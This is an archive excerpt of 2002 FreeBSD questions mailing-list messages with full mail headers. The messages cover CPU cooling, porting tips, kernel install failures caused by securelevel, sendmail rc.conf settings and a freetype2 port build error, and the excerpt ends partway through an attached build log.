>normal ? motherboard temp is somewhere at 50C. the temp hike is > >generally when i am in freebsd or playing games in win2k. running > normal > >apps (ie, editors, etc) is generally not a problem. is this a problem > >b/w the cpu and the mb > > Not between your mb and your CPU. Your heatsink, fan and case > cooling. (BTW, what is the ambient temperature in the computer room?) > Ambient temp is around 30-40C > Have a case with some room in it for air circulation. Have > both intake > (in front, low) and exhaust (in back, high) fans in it. PC Power and > Cooling sells very quiet but effective "Silencer" fans that > work well for > this. Also, make sure your power supply has an adequate exhaust fan. > Not sure if the PC Power & Cooling has outlets in India. I'll check for cases with these fans and enough space for air circulation. Right now, I have a power supply fan at the back and a CPU fan. cabinet is also a little crowded. > Re your CPU heatsink and fan, there are sites, reviews and > resellers all > over the Web about this. While any AMD approved heatsink and fan > ought to keep your CPU from overheating if the case ventilation is > adequate, just below 90-95C is not where you want to be. The CPU > won't die immediately, but cooler conditions may cause it to > live longer > and will leave more of a margin for "error" (dust accumulation, warm > days, etc.). > > Read about how to prepare and install a heatsink and fan with thermal > compound to promote heat transfer between the CPU core and heatsink. > Then select a heatsink/fan that gives you good cooling at an > acceptable > noise level, AND IS EASY TO ATTACH OR REMOVE WITHOUT THE > DANGER OF STICKING A SCREWDRIVER THROUGH YOUR > MOTHERBOARD. (This latter will depend on your own aptitude with > tools to some extent.;) As to my aptitude with tools, note that i managed to smash my finger on the CPU fan :-) > > After trying several heatsink/fans I've personally settled on > the Thermal > Integration TI77N, but there are likely almost as many > opinions in this > regard as there are custom built computers with AMD CPUs. The > maximum temperature I see is around 55-56C. It used to be like that before I upgraded my motherboard. However, I did not change my processor. I think some of the glue b/w the cpu and heatsink may have come off. think that could be the reason ? > > Jud > how is the thouroughbred compared to the palomino ? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 3:58:34 2002 Delivered-To: freebsd-questions@freebsd.org Received: from martin.kleinerdrache.org (static62-99-146-055.adsl.inode.at [62.99.146.55]) by hub.freebsd.org (Postfix) with SMTP id 89B6A37B43B for ; Tue, 25 Jun 2002 03:57:57 -0700 (PDT) Received: (qmail 12188 invoked from network); 25 Jun 2002 11:00:23 -0000 Received: from unknown (HELO localhost.kdrache.org) (127.0.0.1) by loopback with SMTP; 25 Jun 2002 11:00:23 -0000 Subject: Re: Porting Tips From: Martin Klaffenboeck To: Paul Everlund Cc: Gavin Kenny , questions@freebsd.org In-Reply-To: References: Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7 Date: 25 Jun 2002 13:00:23 +0200 Message-Id: <1025002823.677.30.camel@martin.kleinerdrache.org> Mime-Version: 1.0 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Am Di, 2002-06-25 um 12.52 schrieb Paul Everlund: > > Have "ported" some applications to FreeBSD that where > meant for Linux and Solaris. What I did was compiling > the code with a lot of warning options turned on, then > fixing errors as they did appear. One was for example > O_SYNC to O_FSYNC. In the end it did run ok! > > Not a "nice" way of porting applications I guess, but > it has worked for me. :-) I think, thats a good way to work like that. Because thats fast and often efficient. Sure the problem is, that you have to compare what 0_SYNC does and 0_FSYNC does. If its quite the same, it's ok, if it's not you have to find a second way and you have to patch all this things which are different. But normally you don't want to take the time to find that out or to patch the whole programm. So I think it's ok just change 0_SYNC to 0_FSYNC. If there are some troubles you don't find out, maybe other people will find that out and send a pr to freebsd... ;-) Martin -- Virtuelle Jugendarbeit auf http://create.kleinerdrache.org ... bald kommt ein neues Layout ... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 3:59:12 2002 Delivered-To: freebsd-questions@freebsd.org Received: from beniaminus.red.cert.org (beniaminus.red.cert.org [192.88.209.10]) by hub.freebsd.org (Postfix) with ESMTP id 648CC37B446 for ; Tue, 25 Jun 2002 03:58:55 -0700 (PDT) Received: from caduceus.indigo.cert.org (caduceus.indigo.cert.org [192.88.209.149]) by beniaminus.red.cert.org (8.11.6/8.11.6/1.5) with ESMTP id g5PAwsj29309 for ; Tue, 25 Jun 2002 06:58:54 -0400 Received: from caduceus.indigo.cert.org (localhost [127.0.0.1]) by caduceus.indigo.cert.org (8.9.3/8.9.3/2.17) with SMTP id GAA22473 for ; Tue, 25 Jun 2002 06:58:54 -0400 (EDT) Date: Tue, 25 Jun 2002 06:58:54 -0400 (EDT) From: Majordomo-owner@cert.org Message-Id: <200206251058.GAA22473@caduceus.indigo.cert.org> Content-Type: multipart/mixed; boundary="----------=_1025002734-22299-8" Content-Transfer-Encoding: binary MIME-Version: 1.0 X-Mailer: MIME-tools 5.316 (Entity 5.212) To: freebsd-questions Subject: Majordomo results: The Garden of Eden Reply-To: Majordomo@cert.org X-Loop: majordomo Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format... ------------=_1025002734-22299-8 Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: binary Content-Description: Ignored part. Ignoring part of type text/html. ------------=_1025002734-22299-8 Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: binary Content-Description: Ignored part. Ignoring part of type audio/x-wav. ------------=_1025002734-22299-8 Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: binary Content-Description: Results from part 2 of toplevel >>>> Content-Type: application/octet-stream; **** Illegal command! **** Skipped 41 lines of trailing unparseable text. No valid commands processed. ------------=_1025002734-22299-8-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 4: 1:53 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.ideal.net.au (ion.ideal.net.au [203.20.241.5]) by hub.freebsd.org (Postfix) with ESMTP id 026AE37B400 for ; Tue, 25 Jun 2002 04:01:46 -0700 (PDT) Received: from localhost (peter@localhost) by mail.ideal.net.au (8.9.3/8.9.3) with ESMTP id VAA39459; Tue, 25 Jun 2002 21:01:34 +1000 (EST) (envelope-from peter@ideal.net.au) Date: Tue, 25 Jun 2002 21:01:33 +1000 (EST) From: Peter MacGee To: Larry Rosenman Cc: Aaron Burke , FreeBSD-Questions Subject: RE: Kernel install problems In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi All, On Tue, 25 Jun 2002, Peter MacGee wrote: > Hi Larry, > > On 25 Jun 2002, Larry Rosenman wrote: > > > On Tue, 2002-06-25 at 05:40, Peter MacGee wrote: > > > Hi Aaron and Everyone, > > > > > > On Tue, 25 Jun 2002, Aaron Burke wrote: > > > > > > > > -----Original Message----- > > > > > From: owner-freebsd-questions@FreeBSD.ORG > > > > > [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Peter MacGee > > > > > Sent: Tuesday, June 25, 2002 02:57 AM > > > > > To: freebsd-questions@FreeBSD.ORG > > > > > Subject: Kernel install problems > > > > > > > > > > > > > > > Hi All, > > > > > I'm currently trying to install a new kernel on my system > > > > > (4.6-STABLE). I have tried both the "new" and the "traditional" > > > > > methods that are prescribed in the handbook, and both times come up > > > > > against the error: > > > > > > > > > > chflags noschg /kernel > > > > > chflags: /kernel: Operation not permitted > > > > > *** Error code 1 (ignored) > > > > > mv /kernel /kernel.old > > > > > mv: rename /kernel to /kernel.old: Operation not permitted > > > > > *** Error code 1 > > > > > > > > > > I have searched archives et al all to no avail. Could anyone please help > > > > > on how to fix this problem? > > > > > > > > Are you running as root while doing these operations? > > > > > > Yes indeed. I have also had this exact same problem on another box of mine > > > running 4.5-RELEASE... Both times I was root whilst trying to perform the > > > operation. > > I'll bet your kern.securelevel is >0. > > You're quite correct, a quick scan of /etc/rc.conf reveals: > > kern_securelevel="2" > kern_securelevel_enable="YES" > > Should I comment these lines out, reboot, make install, re-instate > kern_securelevel lines, reboot and life be dandy? > Just for everyones info, I tried my suggested remedy, and it worked a charm. Not sure if its the correct way, but life is dandy for me! :-) Cheers, Pete. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 4:45:46 2002 Delivered-To: freebsd-questions@freebsd.org Received: from dire.bris.ac.uk (dire.bris.ac.uk [137.222.10.60]) by hub.freebsd.org (Postfix) with ESMTP id 0738337B403 for ; Tue, 25 Jun 2002 04:45:40 -0700 (PDT) Received: from mail.ilrt.bris.ac.uk by dire.bris.ac.uk with SMTP-PRIV with ESMTP; Tue, 25 Jun 2002 12:45:19 +0100 Received: from cmjg (helo=localhost) by mail.ilrt.bris.ac.uk with local-esmtp (Exim 3.16 #1) id 17Mojn-0000KD-00; Tue, 25 Jun 2002 12:43:59 +0100 Date: Tue, 25 Jun 2002 12:43:58 +0100 (BST) From: Jan Grant X-X-Sender: cmjg@mail.ilrt.bris.ac.uk To: Johan du Toit Cc: freebsd-questions@FreeBSD.ORG Subject: Re: Support Request...vi related In-Reply-To: <3D18801A.11965.A98DF8@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 25 Jun 2002, Johan du Toit wrote: > Good Day! > > I am fairly new in the freeBSD arena and would like to raise this > simple question... > > How can I prevent system messages from scrolling while busy > editing a file in vi ?? It is nearly impossible doing it as you can > imagine. > > I have tried using the :set nomsg command, but no luck. Well, you could try using a different virtual terminal (it, use ALT-F2 to login) since you won't see console stuff there. If you're logged in as root (not su'ed to root) then you may get system alerts - most fo this is configurable through /etc/syslog.conf. -- jan grant, ILRT, University of Bristol. http://www.ilrt.bris.ac.uk/ Tel +44(0)117 9287088 Fax +44 (0)117 9287112 RFC822 jan.grant@bris.ac.uk "...er, that's my _spare_ axe." - Gimli in the Council of Elrond, FotR. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 5: 2:27 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mx1.ovh.net (b1.ovh.net [213.186.33.51]) by hub.freebsd.org (Postfix) with ESMTP id 6BA4437B403 for ; Tue, 25 Jun 2002 05:02:22 -0700 (PDT) Received: (qmail 1201 invoked by uid 503); 25 Jun 2002 12:01:21 -0000 Received: from unknown (HELO gueway.home) (212.43.212.24) by ns0.ovh.net with DES-CBC3-SHA encrypted SMTP; 25 Jun 2002 12:01:21 -0000 Received: from greatoak.home (greatoak.home [192.168.1.2]) by gueway.home (8.12.2/8.12.2) with ESMTP id g5PC27YL003988; Tue, 25 Jun 2002 14:02:11 +0200 (CEST) (envelope-from pcasidy@greatoak.home) Message-Id: <200206251202.g5PC27YL003988@gueway.home> Date: Tue, 25 Jun 2002 14:04:28 +0200 (CEST) From: Philippe CASIDY Subject: Re: Support Request...vi related To: johand@jacqueshau.co.za Cc: freebsd-questions@freebsd.org In-Reply-To: <3D18801A.11965.A98DF8@localhost> MIME-Version: 1.0 Content-Type: TEXT/plain; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On 25 Jun, Johan du Toit wrote: > Good Day! > > I am fairly new in the freeBSD arena and would like to raise this > simple question... > > How can I prevent system messages from scrolling while busy > editing a file in vi ?? It is nearly impossible doing it as you can > imagine. > Meanwhile, when such things happen, you can try to type -L. It will refresh the display of the terminal. The best thing is to setup your syslog.conf as you were seggested. Enjoy Phil. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 5:12: 7 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp.a1poweruser.com (oh-chardon6a-62.clvhoh.adelphia.net [68.65.175.62]) by hub.freebsd.org (Postfix) with ESMTP id 8253637B40E for ; Tue, 25 Jun 2002 05:11:46 -0700 (PDT) Received: from barbish (unknown [10.0.10.6]) by smtp.a1poweruser.com (Postfix) with SMTP id 8AEEB59; Tue, 25 Jun 2002 08:15:14 -0400 (EDT) Reply-To: From: "Joe & Fhe Barbish" To: "Paul Everlund" Cc: "FBSDQ" Subject: RE: Periodic mails Date: Tue, 25 Jun 2002 08:11:41 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG The connection attempt message you see in your /var/log/messages is generated by the log-in-vain rc.conf option because you do not have software listening on port 25 the pop3 server front door. Do you have qpopper installed? Do nslookup 192.168.0.5 to see what that ip address is. In 4.6 the sendmail program was updated to a newer release level. If you are using some other MTA as a replacement for sendmail then you must use sendmail_enable="NONE" to totally deactivate the sendmail MTA. Your periodic mails are generated by CRON, not the MTA. The MTA just delivers the mail and acts as the post office. Look in your MTA log for messages which may point you to the real reason your periodic mails are being not delivered. The periodic mails default to user root, are you checking the correct? -----Original Message----- From: owner-freebsd-questions@FreeBSD.ORG [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Paul Everlund Sent: Tuesday, June 25, 2002 6:46 AM To: freebsd-questions@freebsd.org Subject: Periodic mails Hi again! Thanks for the two replies I got, but unfortunately none of them did help, so I try again... In 4.5 I had sendmail_enable="NO" and got my periodic mails. In 4.6 I have sendmail_enable="NONE" and do not get any periodic mails. In /var/log/messages I see: Jun 25 03:02:57 fw /kernel: Connection attempt to TCP 213.64.yy.xx:25 from 192.168.0.5:1325 Should I set sendmail_enable to "NO" in 4.6, instead of "NONE" to recieve them? If that's the case, what security risks are there by using "NO"? Would appreciate an answer from any one out there who can help me out! :-) Thanks in advance! Best regards, Paul To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 5:24:59 2002 Delivered-To: freebsd-questions@freebsd.org Received: from dire.bris.ac.uk (dire.bris.ac.uk [137.222.10.60]) by hub.freebsd.org (Postfix) with ESMTP id 197F637B405 for ; Tue, 25 Jun 2002 05:24:52 -0700 (PDT) Received: from mail.ilrt.bris.ac.uk by dire.bris.ac.uk with SMTP-PRIV with ESMTP; Tue, 25 Jun 2002 13:24:18 +0100 Received: from cmjg (helo=localhost) by mail.ilrt.bris.ac.uk with local-esmtp (Exim 3.16 #1) id 17MpLi-00010L-00; Tue, 25 Jun 2002 13:23:10 +0100 Date: Tue, 25 Jun 2002 13:23:10 +0100 (BST) From: Jan Grant X-X-Sender: cmjg@mail.ilrt.bris.ac.uk To: Joe & Fhe Barbish Cc: Paul Everlund , FBSDQ Subject: RE: Periodic mails In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 25 Jun 2002, Joe & Fhe Barbish wrote: > The connection attempt message you see in your /var/log/messages is > generated by the log-in-vain rc.conf option because you do not have > software listening on port 25 the pop3 server front door. > Do you have qpopper installed? Eh? Port 25 is for SMTP, not POP. > Do nslookup 192.168.0.5 to see what that ip address is. The address given is a nonrouable local address; potentially the address attached to an internal NIC. > In 4.6 the sendmail program was updated to a newer release level. > If you are using some other MTA as a replacement for sendmail then you > must use sendmail_enable="NONE" to totally deactivate the sendmail MTA. > Your periodic mails are generated by CRON, not the MTA. The MTA just > delivers the mail and acts as the post office. Look in your MTA log for > messages which may point you to the real reason your periodic mails > are being not delivered. The periodic mails default to user root, > are you checking the correct? > > > > > -----Original Message----- > From: owner-freebsd-questions@FreeBSD.ORG > [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Paul Everlund > Sent: Tuesday, June 25, 2002 6:46 AM > To: freebsd-questions@freebsd.org > Subject: Periodic mails > > Hi again! > > Thanks for the two replies I got, but unfortunately none > of them did help, so I try again... > > In 4.5 I had sendmail_enable="NO" and got my periodic mails. > > In 4.6 I have sendmail_enable="NONE" and do not get any > periodic mails. > > In /var/log/messages I see: > Jun 25 03:02:57 fw /kernel: Connection attempt to > TCP 213.64.yy.xx:25 from 192.168.0.5:1325 > > Should I set sendmail_enable to "NO" in 4.6, instead of > "NONE" to recieve them? If that's the case, what security > risks are there by using "NO"? > > Would appreciate an answer from any one out there who can > help me out! :-) There are now four (count 'em!) sendmail switches that can be used in /etc/rc.conf - see your updated /etc/default/rc.conf for details. This was discussed in freebsd-stable when the changeover happened, so you may find more information there. Anyhoo, they are: sendmail_enable="YES" # Run the sendmail inbound daemon (YES/NO/NONE). # If NONE, don't start any sendmail processes. sendmail_submit_enable="YES" # Start a localhost-only MTA for mail submission sendmail_outbound_enable="YES" # Dequeue stuck mail (YES/NO). sendmail_msp_queue_enable="YES" # Dequeue stuck clientmqueue mail (YES/NO). You probably want NO, YES, YES, YES, respectively. -- jan grant, ILRT, University of Bristol. http://www.ilrt.bris.ac.uk/ Tel +44(0)117 9287088 Fax +44 (0)117 9287112 RFC822 jan.grant@bris.ac.uk YKYBPTMRogueW... you try to move diagonally in vi. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 5:26:21 2002 Delivered-To: freebsd-questions@freebsd.org Received: from cpimssmtpu08.email.msn.com (cpimssmtpu08.email.msn.com [207.46.181.83]) by hub.freebsd.org (Postfix) with ESMTP id C4F9137B401 for ; Tue, 25 Jun 2002 05:26:16 -0700 (PDT) Received: from thebe ([67.24.229.195]) by cpimssmtpu08.email.msn.com with Microsoft SMTPSVC(5.0.2195.4905); Tue, 25 Jun 2002 05:25:28 -0700 From: "Aaron Burke" To: "Robert L. Bostic" Cc: "FreeBSD-Questions" Subject: RE: Monitor & video configuration on a laptop Date: Tue, 25 Jun 2002 05:25:07 -0700 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 In-Reply-To: X-OriginalArrivalTime: 25 Jun 2002 12:25:29.0014 (UTC) FILETIME=[6440A560:01C21C43] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG For future reference, Please send messages to this list as Plain Text, and try to wrap your lines at about 70 characters. > -----Original Message----- > From: owner-freebsd-questions@FreeBSD.ORG > [mailto:owner-freebsd-questions@FreeBSD.ORG]On > Behalf Of Robert L. Bostic > Sent: Monday, June 24, 2002 03:27 PM > To: Freebsd-Questions > Subject: Monitor & video configuration on a laptop > > > I successfully installed FreeBSD 4.6 on a Sony PCG-FXA47 laptop. > However, I was unable to find a monitor and video card setting > that will allow me to startx. Startx fails complaining of being > unable to find a usable configuration. After several days of trial > and error, I was compelled to give up and conclude that 4.6 has no > monitor/video card settings compatible with my laptop. Does anyone > know of a work around that I use? Thanks. For starters, what is the model number of the video card? Who makes it? Also, dont worry about the monitor definition. That is generally not a problem at all. > > Robert > neozulu@attbi.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 5:30:43 2002 Delivered-To: freebsd-questions@freebsd.org Received: from viefep11-int.chello.at (viefep11-int.chello.at [213.46.255.27]) by hub.freebsd.org (Postfix) with ESMTP id 19D3537B403 for ; Tue, 25 Jun 2002 05:29:21 -0700 (PDT) Received: from Deadcell.ant ([212.17.108.240]) by viefep11-int.chello.at (InterMail vM.5.01.03.06 201-253-122-118-106-20010523) with ESMTP id <20020625122907.PCQE4240.viefep11-int.chello.at@Deadcell.ant> for ; Tue, 25 Jun 2002 14:29:07 +0200 Received: from Deadcell.ant (localhost [127.0.0.1]) by Deadcell.ant (8.12.3/8.12.3) with ESMTP id g5PCT64H079705 for ; Tue, 25 Jun 2002 14:29:07 +0200 (CEST) (envelope-from ant@Deadcell.ant) Received: (from ant@localhost) by Deadcell.ant (8.12.3/8.12.4/Submit) id g5PCT1Eg079704 for freebsd-questions@freebsd.org; Tue, 25 Jun 2002 14:29:01 +0200 (CEST) Date: Tue, 25 Jun 2002 14:29:01 +0200 From: Andreas Ntaflos To: freebsd-questions@freebsd.org Subject: freetype2 (2.1.1) strange build error Message-ID: <20020625142901.A74942@Deadcell.ant> Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="G4iJoqBmSsgzjUCe" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --G4iJoqBmSsgzjUCe Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Hello list, I have had problems building/upgrading the freetype2 port since 2.0.9 now. Using portupgrade -R freetype2 all works nicely until some point where it says ---> Installing the new version via ports or something and then bails with the following ever repeating erros: ---------- install -c -o root -g wheel -m 444 $P /usr/local/include/freetype2/freetype ; \^M done^M "Makefile", line 26: Need an operator^M "Makefile", line 28: Need an operator^M "./builds/toplevel.mk", line 46: Need an operator^M "./builds/toplevel.mk", line 48: Need an operator^M "./builds/toplevel.mk", line 59: Missing dependency operator^M "./builds/toplevel.mk", line 61: Need an operator^M Error expanding embedded variable.^M "Makefile", line 26: Need an operator^M "Makefile", line 28: Need an operator^M "./builds/toplevel.mk", line 46: Need an operator^M "./builds/toplevel.mk", line 48: Need an operator^M "./builds/toplevel.mk", line 59: Missing dependency operator^M "./builds/toplevel.mk", line 61: Need an operator^M Error expanding embedded variable.^M "Makefile", line 26: Need an operator^M "Makefile", line 28: Need an operator^M "./builds/toplevel.mk", line 46: Need an operator^M "./builds/toplevel.mk", line 48: Need an operator^M "./builds/toplevel.mk", line 59: Missing dependency operator^M "./builds/toplevel.mk", line 61: Need an operator^M ----------- This goes on forever, until it ends with the following: ----------- Error expanding embedded variable. gmake: *** [install] Error 2 *** Error code 2 Stop in /usr/ports/print/freetype2. *** Error code 1 Stop in /usr/ports/print/freetype2. ----------- I have no idea what this is, anyone got any ideas? This certainly is not port-specific, nor depending on the version of FreeBSD (4.6-STABLE, as of Jun 23). I'll attach the whole build log of freetype2, hoping that someone can give me a hint on what's wrong here. Sorry for the bad formatting btw. Thanks and regards -- Andreas "ant" Ntaflos ant@overclockers.at Vienna, AUSTRIA --G4iJoqBmSsgzjUCe Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="freetype2.log" Content-Transfer-Encoding: quoted-printable ---> Upgrading 'freetype2-2.0.9' to 'freetype2-2.1.1' (print/freetype2) ---> Building '/usr/ports/print/freetype2' =3D=3D=3D> Cleaning for gmake-3.79.1_2 =3D=3D=3D> Cleaning for libtool-1.3.4_4 =3D=3D=3D> Cleaning for freetype2-2.1.1 =3D=3D=3D> Extracting for freetype2-2.1.1 >> Checksum OK for freetype-2.1.1.tar.bz2. =3D=3D=3D> freetype2-2.1.1 depends on executable: gmake - found =3D=3D=3D> freetype2-2.1.1 depends on executable: libtool - found =3D=3D=3D> Patching for freetype2-2.1.1 =3D=3D=3D> Applying FreeBSD patches for freetype2-2.1.1 =3D=3D=3D> Configuring for freetype2-2.1.1 checking build system type... i386-unknown-freebsd4.6 checking host system type... i386-unknown-freebsd4.6 checking target system type... i386-unknown-freebsd4.6 checking for gcc... cc checking for C compiler default output... a.out checking whether the C compiler works... yes checking whether we are cross compiling... no checking for suffix of executables...=20 checking for suffix of object files... o checking whether we are using the GNU C compiler... yes checking whether cc accepts -g... yes checking how to run the C preprocessor... cc -E checking for rm... rm -f checking for rmdir... rmdir checking for a BSD-compatible install... /usr/bin/install -c -o root -g whe= el checking for ANSI C header files... yes checking for sys/types.h... yes checking for sys/stat.h... yes checking for stdlib.h... yes checking for string.h... yes checking for memory.h... yes checking for strings.h... yes checking for inttypes.h... yes checking for stdint.h... no checking for unistd.h... yes checking fcntl.h usability... yes checking fcntl.h presence... yes checking for fcntl.h... yes checking for unistd.h... (cached) yes checking for cc option to accept ANSI C... none needed checking for an ANSI C-conforming const... yes checking for int... yes checking size of int... 4 checking for long... yes checking size of long... 4 checking for stdlib.h... (cached) yes checking for unistd.h... (cached) yes checking for getpagesize... yes checking for working mmap... yes checking whether munmap must be declared... no checking for munmap's first parameter type... void * checking for memcpy... yes checking for memmove... yes checking for ld used by GCC... /usr/libexec/elf/ld checking if the linker (/usr/libexec/elf/ld) is GNU ld... yes checking for /usr/libexec/elf/ld option to reload object files... -r checking for BSD-compatible nm... /usr/bin/nm -B checking whether ln -s works... yes checking how to recognise dependant libraries... pass_all checking command to parse /usr/bin/nm -B output... ok checking dlfcn.h usability... yes checking dlfcn.h presence... yes checking for dlfcn.h... yes checking for ranlib... ranlib checking for strip... strip checking for objdir... .libs checking for cc option to produce PIC... -fPIC checking if cc PIC flag -fPIC works... yes checking if cc static flag -static works... yes checking if cc supports -c -o file.o... yes checking if cc supports -c -o file.lo... yes checking if cc supports -fno-rtti -fno-exceptions... yes checking whether the linker (/usr/libexec/elf/ld) supports shared libraries= ... yes checking how to hardcode library paths into programs... immediate checking whether stripping libraries is possible... yes checking dynamic linker characteristics... freebsd4.6 ld.so checking if libtool supports shared libraries... yes checking whether to build shared libraries... yes checking whether to build static libraries... yes checking whether -lc should be explicitly linked in... yes creating libtool checking host system type... i386-unknown-freebsdelf4.6 checking for ranlib... ranlib checking whether we are using GNU C... yes checking for object suffix... o checking for executable suffix... no checking for cc option to produce PIC... -fPIC checking if cc PIC flag -fPIC works... yes checking if cc supports -c -o file.o... yes checking if cc supports -c -o file.lo... yes checking if cc supports -fno-rtti -fno-exceptions ... yes checking if cc static flag -static works... -static checking whether ln -s works... yes checking for ld used by GCC... /usr/libexec/elf/ld checking if the linker (/usr/libexec/elf/ld) is GNU ld... yes checking whether the linker (/usr/libexec/elf/ld) supports shared libraries= ... yes checking for BSD-compatible nm... /usr/bin/nm -B checking command to parse /usr/bin/nm -B output... ok checking how to hardcode library paths into programs... immediate checking for /usr/libexec/elf/ld option to reload object files... -r checking dynamic linker characteristics... freebsdelf4.6 ld.so checking if libtool supports shared libraries... yes checking whether to build shared libraries... yes checking whether to build static libraries... yes checking for objdir... .libs creating libtool configure: creating ./config.status config.status: creating unix-cc.mk config.status: creating unix-def.mk config.status: creating freetype-config config.status: creating ftconfig.h FreeType build system -- automatic system detection The following settings are used: platform unix compiler cc configuration directory ./builds/unix configuration rules ./builds/unix/unix.mk If this does not correspond to your system or settings please remove the fi= le `config.mk' from this directory then read the INSTALL file for help. Otherwise, simply type `gmake' again to build the library. =3D=3D=3D> Building for freetype2-2.1.1 /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -o /usr/ports/print/free= type2/work/freetype-2.1.1/objs/ftsystem.lo /usr/ports/print/freetype2/work/= freetype-2.1.1/builds/unix/ftsystem.c mkdir /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe /usr/ports/print/freetype2/work/freety= pe-2.1.1/builds/unix/ftsystem.c -fPIC -DPIC -o /usr/ports/print/freetype2/= work/freetype-2.1.1/objs/.libs/ftsystem.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe /usr/ports/print/freetype2/work/freety= pe-2.1.1/builds/unix/ftsystem.c -o /usr/ports/print/freetype2/work/freetype= -2.1.1/objs/ftsystem.o >/dev/null 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/ftsystem.lo= /usr/ports/print/freetype2/work/freetype-2.1.1/objs/ftsystem.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -o 